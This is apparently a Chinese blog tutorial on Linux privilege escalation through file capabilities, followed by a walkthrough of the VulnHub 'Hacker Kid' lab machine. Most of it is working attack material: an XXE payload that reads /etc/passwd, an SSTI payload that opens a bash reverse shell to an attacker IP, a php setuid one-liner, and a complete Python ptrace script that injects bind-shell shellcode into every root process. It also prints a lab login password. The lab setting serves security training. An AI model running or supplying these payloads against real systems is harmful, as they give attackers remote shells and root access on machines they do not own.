参考教程: Linux提权之:利用capabilities提权 - f_carey - 博客园
Capbility能力相当于SUID的高级版,相比SUID,Capability能力可以细分权限
具体可以看 二、Capability能力细分
利用参考可以看: GTFOBins
设置能力:setcap cap_setuid+ep /tmp/php
删除能力:setcap -r /tmp/php
查看单个能力:/sbin/getcap /usr/bin/php
查看所有的能力:/sbin/getcap -r / 2>/dev/null
利用例子,以php为例
我们可以先到GTFOBins里面去看下php的capbilities利用语句
我们在kali里面测试一下。用一个不是root权限的用户进行测试
cp /usr/bin/php /tmp/php
cd /tmp
chmod +x php
./php -r "posix_setuid(0); system('/bin/bash');"
成功提权
Hacker_Kid
WP参考: Hacker_Kids靶机渗透WP - 简书
环境: Hacker kid: 1.0.1 ~ VulnHub
重点讲通过Capbility能力提权,获取shell过程就简写一下
信息收集
nmap
看网站源码
遍历爆破/page_no=* 找到正确的/page_no=21
dig反查子域名
dig hackers.blackhat.local @192.168.0.10
修改hosts文件
192.168.0.10 hackers.blackhat.local
192.168.0.10 hackerkid.blackhat.local
访问 hackerkid.blackhat.local
获取sehll
XXE 漏洞利用
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE TEST [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>
<name>1</name>
<tel>2</tel>
<email>&xxe;</email>
<password>4</password>
</root>
查看saket用户的.bashrc文件
php://filter/convert.base64-encode/resource=/home/saket/.bashrc
因为/etc/passwd里面没有admin用户,所以这个并不是系统用户的账号密码,可能是网站后台或者数据库密码的
SSTI漏洞利用
访问9999端口
账户:saket
密码:Saket!#$%@!!
发现存在ssti漏洞
反弹shell
?name={% import os %}{{os.system('bash -c "bash -i > /dev/tcp/192.168.0.4/5555 0>&1 2>&1"')}}
url编码一下
获得shell
Capabilitiy能力提权
先查看所有能力
/sbin/getcap -r / 2>/dev/null
在 Capability能力细分中发现可以利用给的就是
/usr/bin/python2.7 = cap_sys_ptrace+ep 允许跟踪任何进程
这个利用与windows提权中的进程注入提权类似。允许跟着任何进程,我们就可以跟踪一个正在运行的root权限进程。就可以享受宿主进程的权限(root权限)
利用python注入脚本提权
# inject.py# The C program provided at the GitHub Link given below can be used as a reference for writing the python script.
# GitHub Link: https://github.com/0x00pf/0x00sec_code/blob/master/mem_inject/infect.c
import ctypes
import sys
import struct
# Macros defined in <sys/ptrace.h>
# https://code.woboq.org/qt5/include/sys/ptrace.h.html
PTRACE_POKETEXT = 4
PTRACE_GETREGS = 12
PTRACE_SETREGS = 13
PTRACE_ATTACH = 16
PTRACE_DETACH = 17
# Structure defined in <sys/user.h>
# https://code.woboq.org/qt5/include/sys/user.h.html#user_regs_struct
class user_regs_struct(ctypes.Structure):
_fields_ = [
("r15", ctypes.c_ulonglong),
("r14", ctypes.c_ulonglong),
("r13", ctypes.c_ulonglong),
("r12", ctypes.c_ulonglong),
("rbp", ctypes.c_ulonglong),
("rbx", ctypes.c_ulonglong),
("r11", ctypes.c_ulonglong),
("r10", ctypes.c_ulonglong),
("r9", ctypes.c_ulonglong),
("r8", ctypes.c_ulonglong),
("rax", ctypes.c_ulonglong),
("rcx", ctypes.c_ulonglong),
("rdx", ctypes.c_ulonglong),
("rsi", ctypes.c_ulonglong),
("rdi", ctypes.c_ulonglong),
("orig_rax", ctypes.c_ulonglong),
("rip", ctypes.c_ulonglong),
("cs", ctypes.c_ulonglong),
("eflags", ctypes.c_ulonglong),
("rsp", ctypes.c_ulonglong),
("ss", ctypes.c_ulonglong),
("fs_base", ctypes.c_ulonglong),
("gs_base", ctypes.c_ulonglong),
("ds", ctypes.c_ulonglong),
("es", ctypes.c_ulonglong),
("fs", ctypes.c_ulonglong),
("gs", ctypes.c_ulonglong),
]
libc = ctypes.CDLL("libc.so.6")
pid=int(sys.argv[1])
# Define argument type and respone type.
libc.ptrace.argtypes = [ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p]
libc.ptrace.restype = ctypes.c_uint64
# Attach to the process
libc.ptrace(PTRACE_ATTACH, pid, None, None)
registers=user_regs_struct()
# Retrieve the value stored in registers
libc.ptrace(PTRACE_GETREGS, pid, None, ctypes.byref(registers))
print("Instruction Pointer: " + hex(registers.rip))
print("Injecting Shellcode at: " + hex(registers.rip))
# Shell code copied from exploit db.
shellcode="\x48\x31\xc0\x48\x31\xd2\x48\x31\xf6\xff\xc6\x6a\x29\x58\x6a\x02\x5f\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02\x15\xe0\x54\x5e\x52\x6a\x31\x58\x6a\x10\x5a\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x48\x97\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"
# Inject the shellcode into the running process byte by byte.
for i in xrange(0,len(shellcode),4):
# Convert the byte to little endian.
shellcode_byte_int=int(shellcode[i:4+i].encode('hex'),16)
shellcode_byte_little_endian=struct.pack("<I", shellcode_byte_int).rstrip('\x00').encode('hex')
shellcode_byte=int(shellcode_byte_little_endian,16)
# Inject the byte.
libc.ptrace(PTRACE_POKETEXT, pid, ctypes.c_void_p(registers.rip+i),shellcode_byte)
print("Shellcode Injected!!")
# Modify the instuction pointer
registers.rip=registers.rip+2
# Set the registers
libc.ptrace(PTRACE_SETREGS, pid, None, ctypes.byref(registers))
print("Final Instruction Pointer: " + hex(registers.rip))
# Detach from the process.
libc.ptrace(PTRACE_DETACH, pid, None, None)
python -m http.server 8080 //kali起一个网站
wget http://192.168.0.4:8080/inject.py //靶机下载脚本
for i in `ps -ef|grep root|grep -v "grep"|awk '{print $2}'`; do python2.7 inject.py $i; done
//注入所有进程,避免有些进程没有root权限,
当注入到有root权限的进程后会开放5600端口,kali连接5600
nc 192.168.0.10 5600
1716
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
